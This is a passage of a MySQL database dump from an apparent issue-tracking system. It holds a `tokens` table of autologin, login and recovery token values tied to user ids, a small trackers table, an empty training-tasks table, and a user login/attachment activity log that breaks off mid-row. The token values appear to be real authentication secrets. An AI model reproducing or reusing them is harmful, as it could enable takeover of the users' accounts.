INSERT INTO `tokens` VALUES (2,4,'autologin','5e1b2e89c274ffd256e26ef56362e6c7da6b7dff','2018-07-20 09:15:51'),(3,3,'autologin','ccb17eb28d242c779af3a356bf491007316fe093','2018-07-19 16:29:23'),(4,5,'autologin','e37ba63e3b82d219ce363814cc9c18279eadd49c','2019-01-15 09:36:08'),(5,7,'autologin','574f7945ecfeeacab0fa2654be96def056996029','2018-08-20 14:11:22'),(7,8,'autologin','62919db6584e3c6ef6717bddf1ae7c49dc9d8a9c','2019-09-20 09:22:06'),(8,10,'autologin','b266a63527a1a782855cef0c1e3792c9a8b73518','2018-10-07 17:28:52'),(9,6,'autologin','71526933c7dbc8886fbbf78d1e9d0a86dfa488da','2019-08-16 07:27:35'),(10,11,'autologin','91c5cebc84c2d3ca0aa024b176c1453ec585b561','2018-08-22 16:29:43'),(11,9,'autologin','a152e1b19c7087d6868f2430dfdf2c1117c8ce1d','2018-11-14 15:36:27'),(12,13,'autologin','db6222b253e985a87183df52fc45a4deea42a3a4','2018-08-31 11:55:26'),(13,17,'autologin','ee6b11dc878092934fd99b02ebe13ba2949e31e0','2018-12-18 14:58:23'),(14,15,'autologin','1701489d0484d326f08985cb7a750235f58ebe9c','2018-11-14 16:59:36'),(15,12,'autologin','4843774311cef23967256378543d96d63caeadd9','2018-11-14 15:32:08'),(16,1,'autologin','de5082853e948d2a8a64b50c5a2372895dc4a91d','2020-08-11 15:14:53'),(17,19,'autologin','fe7448967ed7cbf0edfd11d497730a958f7860a1','2019-01-21 09:48:45'),(18,21,'autologin','2c297df7528635ba27730dda7d4a2da82bcf2018','2019-01-25 11:47:33'),(19,22,'autologin','43bddab607a98b7808d2a432854e6c313508a0c5','2019-03-21 20:31:18'),(20,30,'autologin','0e075763e7c5e540169d6f7504e00597a271bdf9','2019-02-21 11:17:55'),(21,28,'autologin','adbbd743388c7d96d715ab7a5ad341112a5ef42e','2019-03-04 09:58:51'),(22,26,'autologin','857298055ef46063adfa1806f4ded9828e4d76a7','2019-11-21 16:58:08'),(23,27,'autologin','6541acd2d5867d75ed3273d7294e2895a6c871f7','2019-03-13 10:18:51'),(24,31,'autologin','9925823480449d5f5fc37c87cae95561acfc9b68','2019-04-28 09:00:34'),(25,29,'autologin','581b926c11aba16a13b2ed09cb2db280ddd1cb60','2019-10-11 16:33:23'),(26,32,'autologin','73b524fd752e1435f4d727398167ddafe171e5dd','2019-10-29 21:15:20'),(27,41,'autologin','21a9533fd4b1df7c80d898249bdfb69ccae44289','2019-10-28 15:07:12'),(29,42,'login','02b313aa56ba6b97168cb50cd3220b2450efa0cb','2019-04-17 09:41:33'),(30,42,'autologin','74180783abef5b62e6016fb0e78e32ed9c5d4c80','2019-04-17 09:43:51'),(31,48,'autologin','64216786c91628741fee48c7b877b2a23df504bd','2020-08-10 09:10:32'),(33,49,'autologin','0682cd4cc64f060ea03a6a9e8cc1f8104877533e','2020-08-11 15:26:16'),(34,50,'autologin','0449ff7e73e39aa8dbd96ed4cef8a9065a27b97e','2020-01-17 16:22:37'),(35,51,'autologin','3c09f93294a516786610e50148f8050fb453dd81','2020-03-14 09:28:49'),(36,52,'autologin','b76df2be39e1d67b5c3683097ef263841bbcad5a','2019-11-26 15:06:50'),(37,16,'autologin','3510685ec26412bf35762bb4f9511dc57de2bb3f','2019-09-24 10:02:13'),(38,53,'autologin','a789a14a93b19dc99142ca66ff30d0b40b2f655a','2019-11-11 16:02:16'),(39,20,'autologin','06d33eb179910b4e81d6cfa9d5ba4a5f94ca3f71','2019-10-23 09:09:27'),(40,54,'autologin','3052b2abba259269f00b54a1d2a8eb96c91a6e61','2019-08-26 08:58:10'),(41,46,'autologin','a55ccef2bd0173b7aa7bf9326c4c507669928c97','2020-08-11 08:10:18'),(42,55,'autologin','a23013d0ba995bb6f9e926bf67c2ee26ac929212','2020-08-10 09:29:16'),(43,56,'autologin','1c80b25424c22249c2be7bf9a4641f035d1973f3','2019-09-16 10:29:59'),(44,58,'autologin','a02f6484a72712c90d59df348a378ca6c56dfcf6','2019-11-12 09:23:14'),(48,46,'recovery','3d90060c2fa99f113317ba8b8d712f5d32d70506','2019-10-29 13:01:35'),(49,61,'autologin','f1dd05c1fc996d21918fa53b49bcbc809fce0b4b','2019-11-25 17:13:22'),(50,62,'autologin','8b79e9ad565124ec2a7eb8200c9433753569304c','2019-10-29 17:09:55'),(51,63,'autologin','6f2fafbbed0f445c3cba243c3c696e9504584e0c','2020-03-24 08:53:51'),(52,64,'autologin','d716220028c7a6369246744ced6734a0f7025ff9','2020-08-10 08:49:27'),(53,65,'autologin','57fccf9cd9e34f75994350dd7ddcd7f99e3aa615','2020-03-23 15:03:11'),(54,66,'autologin','d4aace751114329bbed1401310619dec53e88226','2020-08-10 08:48:34'),(55,71,'autologin','8a7e75bffdc16156de0e2f9a0a3e501e8e2923cd','2019-11-10 14:07:49'),(56,69,'autologin','8fd81e3b83f78f50636c0f9283e5f52245d4550b','2019-11-06 16:08:37'),(57,73,'autologin','3ab1807aeede3df6873047cd67cdb083f9edb359','2020-08-10 08:48:52'),(58,76,'autologin','bb2d031d04bc2e8138ded77f34f84471674e419f','2020-04-21 08:23:25'),(59,75,'autologin','754bc078514508bc770c8ee544ebc6074e87e9d2','2020-02-12 08:33:51'),(60,77,'autologin','5625808195a7c110278d7c088864800ae9329e65','2020-02-12 14:42:20'),(61,47,'autologin','f4e567da65ddb85da565c47240cd24e2afc536df','2020-02-13 10:22:18'),(63,79,'autologin','8084c9efdab89daf54ba7728c6a7c2a757321199','2020-02-05 09:50:18'),(64,81,'autologin','f7ed815cf4b7e474a7eb0ab5a0a05e9a0532553b','2020-02-13 09:41:27'),(65,86,'autologin','21faf4d201ca9ad595e474cce4d31d09abca6b18','2020-02-11 09:59:26'),(66,88,'autologin','d3f9e1ef7f6e0b39c03ef48c79f954c05b00b986','2020-02-05 10:48:52'),(67,87,'autologin','92bdc5f027fd6570e769978d9fdf5fa73ececcc5','2020-02-05 10:47:55'),(68,83,'autologin','73b09feeb89f3dd426f0cdf36b77f5be0f89ffc2','2020-02-11 09:00:52'),(69,84,'autologin','ae8c25b3266c0fb488aa1dc15bb4c87ab6074d39','2020-02-12 09:26:32'),(70,90,'autologin','00da59e05d85993c3d2602a63d4f1d4ac416e9f4','2020-02-11 17:08:53'),(71,80,'autologin','1573db6103f63e11d357997018711d6de5b055d3','2020-04-20 09:40:10'),(72,101,'autologin','f824f6bbdf8adbf66bc561ab39aca2582cda0d6b','2020-02-05 15:25:45'),(73,91,'autologin','b830e93bb5889295702a3d0e49c5ed8bac2ff8b2','2020-02-11 10:02:01'),(74,96,'autologin','07eab28e6ee925316e5d87f8b0a861025becd262','2020-02-21 16:28:30'),(75,103,'autologin','ccd0cd5977dbbb99497e9a7db30fa3c9d0e0373d','2020-02-12 08:55:14'),(76,94,'autologin','51f8aa4545183419c802a62c8d0910c2273d8bab','2020-02-14 12:05:54'),(77,92,'autologin','b6d6c21c8e1513585238eb63717d1f0011e7d4b3','2020-02-11 09:58:44'),(78,98,'autologin','7bf2f9a345789dc3c7b0d22ba6d6a8ef07c67e40','2020-02-11 20:55:41'),(79,89,'autologin','4b2e018601808485616b3ab23464cfc7d6739c17','2020-02-11 11:27:35'),(80,99,'autologin','d4655ee53676be19f9fc9ffc7d8ac0da10bddd2e','2020-02-13 08:23:35'),(81,82,'autologin','671be890f0c1be25b178a346edf10748c576bce6','2020-02-20 08:31:19'),(82,100,'autologin','b20f6f56af21f25c83e5574be47270bae05451b5','2020-02-11 17:41:41'),(83,97,'autologin','0f3ef8dbdb00a4fbaa8a3060fef4c67b2f9103c9','2020-02-12 08:09:35'),(84,110,'autologin','f9124434b88d3ad5c232f71043996f8ef01bb54e','2020-03-26 16:45:18'),(85,45,'autologin','72b5b3711cc1f02688c0b7f2e96ca792b1c4f963','2020-03-27 19:33:18'),(86,111,'autologin','78bea262b5eba76a77b9a866774d90dd0af27af5','2020-08-11 09:38:44'),(88,111,'autologin_forge_military','b719cd69ab47a7fda90f40caa9db3a77c71b078a','2020-09-28 02:30:20'),(95,113,'autologin_forge_military','03e2ca58c7d2fdfa13acacdf790098babcaf757f','2020-10-14 07:49:18'),(97,114,'autologin_forge_military','6aefebc166cebf9949c745b70b5068e7351c1ab6','2020-08-18 11:14:33'),(104,63,'autologin_forge_military','423ce1796a76c99a829904531988b00eb7f53dc2','2021-01-27 09:37:08'),(105,47,'autologin_forge_military','2deb39e3a1aed2537be666243e40126f1b8c641c','2020-10-13 07:26:30'),(108,112,'autologin_forge_military','2b975f5aef83b7eb452a923320cb14ed559628fc','2020-11-30 11:37:26'),(110,116,'autologin_forge_military','b22478b4243419215f54b1f7dd4e57ca4fc606d6','2020-09-29 09:20:53'),(112,50,'autologin_forge_military','598e817f5c895428b355caba60bde0db9f909394','2021-01-19 02:57:08'),(113,71,'autologin_forge_military','9b6ee4f0bbbe4db61bf089ae99bca24c3570c2e6','2020-10-15 01:43:02'),(114,118,'autologin_forge_military','007d87d8eebd460d855b18e9697060a828bb2903','2020-12-01 10:18:47'),(120,119,'autologin_forge_military','bd4b8fead0c7a6c5d5f9664de3b8e88650aeec77','2021-01-27 14:20:55'),(123,129,'autologin_forge_military','0ee534fa306a9f5da1c77ff4ddcea65dc806f199','2021-01-19 02:50:42'),(139,135,'autologin_forge_military','e55c87355fb99cdc0f7c557abd3dec86cf250bdd','2021-03-12 01:47:38'),(152,136,'autologin_forge_military','c7750eeaab449b42ecaa36624b6f4285e54bcd3e','2021-01-05 02:34:06'),(160,149,'autologin_forge_military','3ff9874a1bb2da1d45793e440cac05fc60a6b572','2021-01-13 01:38:05'),(192,134,'autologin_forge_military','1b26cc47ed681b52c59ab2141d19bf2abbd65baf','2021-01-13 07:38:25'),(198,152,'autologin_forge_military','3be1ee0b7e9897702e22afe4014a500cea30271d','2021-01-28 14:09:36'),(211,49,'autologin_forge_military','a7136be5b96b13d28369bf55f7f63c24d72b2794','2021-03-05 00:52:55'),(229,66,'autologin_forge_military','b9d50d68fd9c403657218cd52a88c1c847845139','2021-01-29 01:29:00'),(232,159,'autologin_forge_military','796f0d23718d3b3d59140b8fd97814b73716951c','2021-02-22 08:23:56'),(236,160,'autologin_forge_military','5ebb801ab5614dd7719527d5cfd681d3d638d87d','2021-03-10 08:43:23'),(241,115,'autologin_forge_military','37010ce70a93c51b42662aa974262338aebe2c98','2021-02-09 02:10:04'),(245,161,'autologin_forge_military','d3623cd4446663afc5c85da0c25cd008c4c82a55','2021-02-20 01:30:03'),(246,162,'autologin_forge_military','07d8c1a8e5f89b2d2836675ec13bb7599bd3179a','2021-03-07 09:46:23'),(247,163,'autologin_forge_military','32c730d6e8801a151df6830ca49c52b7cbcddffd','2021-02-20 01:33:58'),(248,164,'autologin_forge_military','085a7b4b1d7d473772e651797f4ba62cda0d9351','2021-03-12 05:24:21'),(249,166,'autologin_forge_military','9717b3a00724ca4a5bdfab4728869518e479f545','2021-02-20 01:45:54'),(250,167,'autologin_forge_military','b32aa3b6b4144961ec42f4e7c0f8a0826c7e36ae','2021-02-20 01:49:10'),(251,165,'autologin_forge_military','d5cf1880fc570aa986b12a86d722f2d1f25c7be8','2021-03-05 07:46:48'),(252,168,'autologin_forge_military','e919d03fd752e63bde700987f976b584fefb2003','2021-02-20 01:59:33'),(253,169,'autologin_forge_military','fb5fbe6acad4418f5dde44c5505e2a49e3e01470','2021-02-20 02:16:06'),(254,170,'autologin_forge_military','7eca966f6e0a4933cea2ab9d60384c9a25d06f51','2021-02-20 02:37:43'),(255,171,'autologin_forge_military','44cc06ceb3e8b2eca714d80e66e31c9bbeb03498','2021-03-06 10:03:33'),(257,155,'autologin_forge_military','c3a1d74b0f6408dd444299f9be1848a42ee99d70','2021-02-20 04:48:19'),(258,173,'autologin_forge_military','aa813db0ea1ab30eb75aa9858d78a99fb5a4d211','2021-03-04 02:49:51'),(261,172,'autologin_forge_military','6d6dff012dfaf864a9cf24460596ddd1df410a89','2021-02-20 08:55:41'),(262,176,'autologin_forge_military','95aa4058dbe28647bbe2ca1f5d67a5c77d06abf6','2021-02-20 11:48:19'),(263,177,'autologin_forge_military','e7ccc84f3ff7584fae56d550f29d6646f6483cc8','2021-03-05 06:30:30'),(267,137,'autologin_forge_military','0b4917069f4b6ea9e0386c3e3e9ef61b46f71dd2','2021-03-08 01:57:57'),(268,178,'autologin_forge_military','43e4c554b0e90d78d37c26c55524a6750a0ecc6c','2021-02-24 08:25:10'),(270,179,'autologin_forge_military','dabc94eb1d34c4c263bc99964f5dcaca6e8cfb5e','2021-03-02 01:26:36'),(271,180,'autologin_forge_military','fb73d72be5d923a16a9e625cf3ffc26d2c22144a','2021-03-06 09:01:41'),(272,181,'autologin_forge_military','ff6777598e516aaebf248a5029ea2888d2f377b4','2021-03-01 01:34:52'),(274,182,'autologin_forge_military','334709b39daf159606a845dbd1a332bce7c2902f','2021-03-03 07:00:20'),(276,183,'autologin_forge_military','fefccb447bc556e403b59551a4fac489b0dcb820','2021-03-02 05:58:13'),(279,184,'autologin_forge_military','3a31ac8397e8a0e17179d3b7ab163b28f7a7552e','2021-02-26 02:26:33'),(281,185,'autologin_forge_military','465cc48d7a102b8e34017a43a374200c73cc156c','2021-02-26 12:18:20'),(282,46,'autologin_forge_military','353d0178b05988acb303a9783a59e7a1fc18d02e','2021-03-11 03:04:12'),(283,73,'autologin_forge_military','549d0816ad3ea74fbae8b4b531cf690dc5974c2d','2021-03-01 08:22:47'),(286,187,'autologin_forge_military','d2bd7859599c2494c86040f0a55e3a0c7665f4f1','2021-03-05 02:49:56'),(288,1,'autologin_forge_military','52b1c22857905503aedcfb60e3e5aa150a6e4117','2021-03-11 00:42:14'),(289,190,'autologin_forge_military','73abfb8f58e3022c0f8a6a78d626216804b40fb2','2021-03-04 02:16:20'),(292,194,'autologin_forge_military','9ed84bdba56fcf0707709a708d2f2993f0964f01','2021-03-04 02:21:39'),(293,195,'autologin_forge_military','9f249e8e651e98bd3250ad68334545a18f397a65','2021-03-04 02:21:51'),(294,193,'autologin_forge_military','ff5efd23c56b44fffeef8f9973a10286869088bb','2021-03-04 02:24:49'),(295,197,'autologin_forge_military','90efcfe01b7c026f11c6d09383ff1894b7a44fd3','2021-03-04 02:38:57'),(297,175,'autologin_forge_military','378a70198fdae2fa479ef45b8abb85febdf06e4c','2021-03-04 02:49:14'),(298,200,'autologin_forge_military','ddc31c9f3ab100e4e93a850043cd5be0b097f503','2021-03-04 03:11:43'),(300,192,'autologin_forge_military','15442061c0770f4f3925c7d77c47ad532765271e','2021-03-15 02:24:04'),(301,186,'autologin_forge_military','8d7bcbacdc2841f090ba1afc409f132741f47a30','2021-03-06 02:41:27'),(303,191,'autologin_forge_military','c91744f15f4f00e6aeb6ee2b003acb5ec221c0e6','2021-03-05 05:02:11'),(304,203,'autologin_forge_military','fde442eeb23e63ab864c76a479cc999d3bfbbc39','2021-03-05 05:16:52'),(308,206,'autologin_forge_military','72d4c1b39956f23886b52a61f8e512236745f02b','2021-03-05 14:05:15'),(311,207,'autologin_forge_military','a58183d5ad1842c8195501456b9ee2a663c330a8','2021-03-06 09:20:06'),(312,208,'autologin_forge_military','3a961b3dc245cd2038b24c223eb751c6c27d062e','2021-03-06 09:27:42'),(313,209,'autologin_forge_military','770cd71cd7301ca4ed43d346368b1dc05639ab23','2021-03-06 10:06:28'),(314,210,'autologin_forge_military','5539fa37a591fda74e2489fbd789c114c31410de','2021-03-06 11:58:49'),(315,189,'autologin_forge_military','a834112f73e90db8195384ff9ff3936058b43dd3','2021-03-09 03:58:22'),(316,211,'autologin_forge_military','2d0acb47f9262a8885a9f9254171575a492b48ba','2021-03-09 07:47:29'),(322,156,'autologin_forge_military','c604d816a3d29f45fd23c24d048f02b8a9b00011','2021-03-09 07:56:55'),(323,212,'autologin_forge_military','f48e671c0dc16dc284a92a65c3965d974933e538','2021-03-09 08:02:28'),(324,213,'autologin_forge_military','0932139e574d6b46ecea3a6e7f6545fd27de20fe','2021-03-09 08:21:59'),(325,48,'autologin_forge_military','158be48593ed998c76717d1fe7867977bb2bfccd','2021-03-19 11:31:41'),(326,214,'autologin_forge_military','6d2f6e694aa21bcab908949a3cfe0c2bffd95ca9','2021-03-09 08:46:32'),(327,215,'autologin_forge_military','f701367041637787853b070499cab3fbd3268f7b','2021-03-10 12:17:49'),(328,128,'autologin_forge_military','7a7bfcdfffad7a55671ceb8f84710ec5a4dd72d8','2021-03-10 02:17:09'),(330,174,'autologin_forge_military','218e00b79426b4780b3c7ea0c0ad34a683c506ec','2021-03-10 05:22:44'),(331,216,'autologin_forge_military','b72967583a7d551027b9203b2414f9f5d1ac8978','2021-03-10 10:04:18'),(332,217,'autologin_forge_military','3188a416a612f1ce54e24a003b4ee651ca97f948','2021-03-10 23:04:41'),(333,55,'autologin_forge_military','efc00980d1b2854279d576dfb9aa65ecd4df5821','2021-03-11 00:57:53'),(334,218,'autologin_forge_military','24e88ff0182dd8df4c9f2262693655e04715a9c2','2021-03-11 07:06:40'),(336,219,'autologin_forge_military','6d45323e106fdc4880000c5bfa90e325167c99cd','2021-03-13 05:16:43'),(337,220,'autologin_forge_military','d8eb782284b5db56e74c20bca59969ea419a5c71','2021-03-13 03:53:20'),(338,221,'autologin_forge_military','5ceb69fb8f38ca0b195a89deb4881313f1d03025','2021-03-13 06:47:44');
|
||
/*!40000 ALTER TABLE `tokens` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `trackers`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `trackers`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `trackers` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(30) NOT NULL DEFAULT '',
|
||
`is_in_chlog` tinyint(1) NOT NULL DEFAULT '0',
|
||
`position` int(11) DEFAULT '1',
|
||
`is_in_roadmap` tinyint(1) NOT NULL DEFAULT '1',
|
||
`fields_bits` int(11) DEFAULT '0',
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `trackers`
|
||
--
|
||
|
||
LOCK TABLES `trackers` WRITE;
|
||
/*!40000 ALTER TABLE `trackers` DISABLE KEYS */;
|
||
INSERT INTO `trackers` VALUES (1,'缺陷',1,1,0,0),(2,'功能',1,2,1,0),(3,'支持',0,3,0,0),(4,'任务',0,4,1,0),(5,'周报',0,5,1,0);
|
||
/*!40000 ALTER TABLE `trackers` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `training_tasks`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `training_tasks`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `training_tasks` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`tracker_id` int(11) DEFAULT NULL,
|
||
`subject` varchar(255) DEFAULT NULL,
|
||
`description` text,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`author_id` int(11) DEFAULT NULL,
|
||
`status` tinyint(4) DEFAULT '0',
|
||
`position` tinyint(4) DEFAULT '0',
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `training_tasks`
|
||
--
|
||
|
||
LOCK TABLES `training_tasks` WRITE;
|
||
/*!40000 ALTER TABLE `training_tasks` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `training_tasks` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `user_actions`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `user_actions`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `user_actions` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`action_type` varchar(255) DEFAULT NULL,
|
||
`action_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`ip` varchar(255) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=34045 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `user_actions`
|
||
--
|
||
|
||
LOCK TABLES `user_actions` WRITE;
|
||
/*!40000 ALTER TABLE `user_actions` DISABLE KEYS */;
|
||
INSERT INTO `user_actions` VALUES (1,1,'Login',1,'2018-07-06 09:19:27','2018-07-06 09:19:27',NULL),(2,1,'Logout',1,'2018-07-06 09:21:50','2018-07-06 09:21:50',NULL),(3,1,'Login',1,'2018-07-06 10:06:11','2018-07-06 10:06:11',NULL),(4,1,'Login',1,'2018-07-06 10:41:30','2018-07-06 10:41:30',NULL),(5,1,'Login',1,'2018-07-06 10:42:47','2018-07-06 10:42:47',NULL),(6,1,'Login',1,'2018-07-06 10:51:46','2018-07-06 10:51:46',NULL),(7,3,'Logout',3,'2018-07-06 11:00:45','2018-07-06 11:00:45',NULL),(8,1,'Login',1,'2018-07-06 11:00:51','2018-07-06 11:00:51',NULL),(9,1,'Login',1,'2018-07-06 16:54:39','2018-07-06 16:54:39',NULL),(10,1,'Attachment',1,'2018-07-06 17:42:32','2018-07-06 17:42:32',NULL),(11,1,'Login',1,'2018-07-06 19:06:19','2018-07-06 19:06:19',NULL),(12,1,'Login',1,'2018-07-06 19:35:00','2018-07-06 19:35:00',NULL),(13,1,'Login',1,'2018-07-06 19:45:29','2018-07-06 19:45:29',NULL),(14,1,'Logout',1,'2018-07-07 10:48:02','2018-07-07 10:48:02',NULL),(15,1,'Login',1,'2018-07-08 09:20:03','2018-07-08 09:20:03',NULL),(16,1,'Login',1,'2018-07-08 09:20:04','2018-07-08 09:20:04',NULL),(17,1,'Login',1,'2018-07-08 09:37:22','2018-07-08 09:37:22',NULL),(18,4,'Logout',4,'2018-07-08 11:23:28','2018-07-08 11:23:28',NULL),(19,1,'Login',1,'2018-07-08 14:10:10','2018-07-08 14:10:10',NULL),(20,1,'Login',1,'2018-07-08 14:10:11','2018-07-08 14:10:11',NULL),(21,1,'Logout',1,'2018-07-08 14:10:18','2018-07-08 14:10:18',NULL),(22,1,'Login',1,'2018-07-08 14:38:47','2018-07-08 14:38:47',NULL),(23,4,'Login',4,'2018-07-08 14:50:37','2018-07-08 14:50:37',NULL),(24,1,'Login',1,'2018-07-08 15:04:40','2018-07-08 15:04:40',NULL),(25,1,'Logout',1,'2018-07-08 15:14:23','2018-07-08 15:14:23',NULL),(26,1,'Login',1,'2018-07-08 15:17:14','2018-07-08 15:17:14',NULL),(27,1,'Login',1,'2018-07-08 15:17:14','2018-07-08 15:17:14',NULL),(28,1,'Logout',1,'2018-07-08 15:20:02','2018-07-08 15:20:02',NULL),(29,4,'Login',4,'2018-07-08 15:20:20','2018-07-08 15:20:20',NULL),(30,1,'Logout',1,'2018-07-08 15:20:42','2018-07-08 15:20:42',NULL),(31,1,'Login',1,'2018-07-08 15:43:40','2018-07-08 15:43:40',NULL),(32,1,'Login',1,'2018-07-09 09:43:09','2018-07-09 09:43:09',NULL),(33,1,'Login',1,'2018-07-09 09:43:10','2018-07-09 09:43:10',NULL),(34,1,'Login',1,'2018-07-09 10:14:50','2018-07-09 10:14:50',NULL),(35,1,'Login',1,'2018-07-09 11:11:15','2018-07-09 11:11:15',NULL),(36,1,'Login',1,'2018-07-09 14:57:01','2018-07-09 14:57:01',NULL),(37,1,'Login',1,'2018-07-10 08:36:51','2018-07-10 08:36:51',NULL),(38,1,'Login',1,'2018-07-10 09:53:02','2018-07-10 09:53:02',NULL),(39,1,'Login',1,'2018-07-10 11:25:41','2018-07-10 11:25:41',NULL),(40,1,'Login',1,'2018-07-10 11:25:48','2018-07-10 11:25:48',NULL),(41,1,'Login',1,'2018-07-10 15:18:13','2018-07-10 15:18:13',NULL),(42,1,'Login',1,'2018-07-10 16:32:42','2018-07-10 16:32:42',NULL),(43,4,'Login',4,'2018-07-10 16:40:58','2018-07-10 16:40:58',NULL),(44,4,'Logout',4,'2018-07-10 16:45:23','2018-07-10 16:45:23',NULL),(45,4,'Login',4,'2018-07-10 16:45:52','2018-07-10 16:45:52',NULL),(46,1,'Logout',1,'2018-07-10 16:57:44','2018-07-10 16:57:44',NULL),(47,1,'Login',1,'2018-07-10 17:04:09','2018-07-10 17:04:09',NULL),(48,4,'Login',4,'2018-07-10 17:09:41','2018-07-10 17:09:41',NULL),(49,4,'Login',4,'2018-07-11 08:54:07','2018-07-11 08:54:07',NULL),(50,4,'Login',4,'2018-07-11 09:11:11','2018-07-11 09:11:11',NULL),(51,1,'Login',1,'2018-07-11 09:30:31','2018-07-11 09:30:31',NULL),(52,1,'Login',1,'2018-07-11 09:36:00','2018-07-11 09:36:00',NULL),(53,4,'Login',4,'2018-07-11 09:43:12','2018-07-11 09:43:12',NULL),(54,1,'Login',1,'2018-07-11 09:46:34','2018-07-11 09:46:34',NULL),(55,1,'Attachment',7,'2018-07-11 10:06:41','2018-07-11 10:06:41',NULL),(56,1,'Attachment',8,'2018-07-11 10:17:46','2018-07-11 10:17:46',NULL),(57,4,'Attachment',8,'2018-07-11 10:22:43','2018-07-11 10:22:43',NULL),(58,1,'Attachment',8,'2018-07-11 10:27:22','2018-07-11 10:27:22',NULL),(59,1,'Attachment',8,'2018-07-11 10:31:06','2018-07-11 10:31:06',NULL),(60,1,'Login',1,'2018-07-11 11:14:14','2018-07-11 11:14:14',NULL),(61,1,'Login',1,'2018-07-11 11:14:14','2018-07-11 11:14:14',NULL),(62,1,'Login',1,'2018-07-11 11:24:06','2018-07-11 11:24:06',NULL),(63,1,'Attachment',8,'2018-07-11 14:16:09','2018-07-11 14:16:09',NULL),(64,1,'Attachment',8,'2018-07-11 14:22:18','2018-07-11 14:22:18',NULL),(65,1,'Attachment',9,'2018-07-11 14:24:31','2018-07-11 14:24:31',NULL),(66,1,'Login',1,'2018-07-11 14:34:37','2018-07-11 14:34:37',NULL),(67,1,'Attachment',10,'2018-07-11 14:45:11','2018-07-11 14:45:11',NULL),(68,1,'Attachment',8,'2018-07-11 14:56:32','2018-07-11 14:56:32',NULL),(69,1,'Attachment',11,'2018-07-11 15:05:10','2018-07-11 15:05:10',NULL),(70,1,'Attachment',8,'2018-07-11 15:05:11','2018-07-11 15:05:11',NULL),(71,1,'Attachment',8,'2018-07-11 15:15:06','2018-07-11 15:15:06',NULL),(72,1,'Login',1,'2018-07-11 15:27:17','2018-07-11 15:27:17',NULL),(73,1,'Login',1,'2018-07-11 15:46:47','2018-07-11 15:46:47',NULL),(74,1,'Attachment',7,'2018-07-11 17:23:26','2018-07-11 17:23:26',NULL),(75,1,'Attachment',13,'2018-07-11 17:24:38','2018-07-11 17:24:38',NULL),(76,1,'Attachment',7,'2018-07-11 17:24:41','2018-07-11 17:24:41',NULL),(77,1,'Login',1,'2018-07-12 09:19:29','2018-07-12 09:19:29',NULL),(78,4,'Login',4,'2018-07-12 09:55:20','2018-07-12 09:55:20',NULL),(79,1,'Login',1,'2018-07-12 14:30:41','2018-07-12 14:30:41',NULL),(80,1,'Login',1,'2018-07-12 14:33:00','2018-07-12 14:33:00',NULL),(81,1,'Login',1,'2018-07-12 14:38:59','2018-07-12 14:38:59',NULL),(82,1,'Login',1,'2018-07-12 14:55:57','2018-07-12 14:55:57',NULL),(83,1,'Login',1,'2018-07-12 15:05:04','2018-07-12 15:05:04',NULL),(84,1,'Login',1,'2018-07-12 16:31:13','2018-07-12 16:31:13',NULL),(85,1,'Login',1,'2018-07-12 17:29:50','2018-07-12 17:29:50',NULL),(86,4,'Login',4,'2018-07-13 09:21:44','2018-07-13 09:21:44',NULL),(87,1,'Login',1,'2018-07-13 09:44:25','2018-07-13 09:44:25',NULL),(88,4,'Login',4,'2018-07-13 11:30:05','2018-07-13 11:30:05',NULL),(89,1,'Login',1,'2018-07-13 11:33:36','2018-07-13 11:33:36',NULL),(90,1,'Login',1,'2018-07-13 16:03:43','2018-07-13 16:03:43',NULL),(91,1,'Login',1,'2018-07-13 17:01:56','2018-07-13 17:01:56',NULL),(92,1,'Login',1,'2018-07-13 19:50:14','2018-07-13 19:50:14',NULL),(93,1,'Login',1,'2018-07-16 14:43:24','2018-07-16 14:43:24',NULL),(94,1,'Login',1,'2018-07-16 14:59:12','2018-07-16 14:59:12',NULL),(95,4,'Login',4,'2018-07-16 16:31:25','2018-07-16 16:31:25',NULL),(96,4,'Logout',4,'2018-07-16 16:31:43','2018-07-16 16:31:43',NULL),(97,1,'Login',1,'2018-07-16 16:31:49','2018-07-16 16:31:49',NULL),(98,1,'Login',1,'2018-07-17 10:16:09','2018-07-17 10:16:09',NULL),(99,1,'Login',1,'2018-07-17 11:18:41','2018-07-17 11:18:41',NULL),(100,1,'Login',1,'2018-07-18 08:48:31','2018-07-18 08:48:31',NULL),(101,1,'Logout',1,'2018-07-18 11:28:41','2018-07-18 11:28:41',NULL),(102,1,'Login',1,'2018-07-18 11:31:27','2018-07-18 11:31:27',NULL),(103,1,'Login',1,'2018-07-18 16:44:18','2018-07-18 16:44:18',NULL),(104,1,'Attachment',14,'2018-07-18 17:29:46','2018-07-18 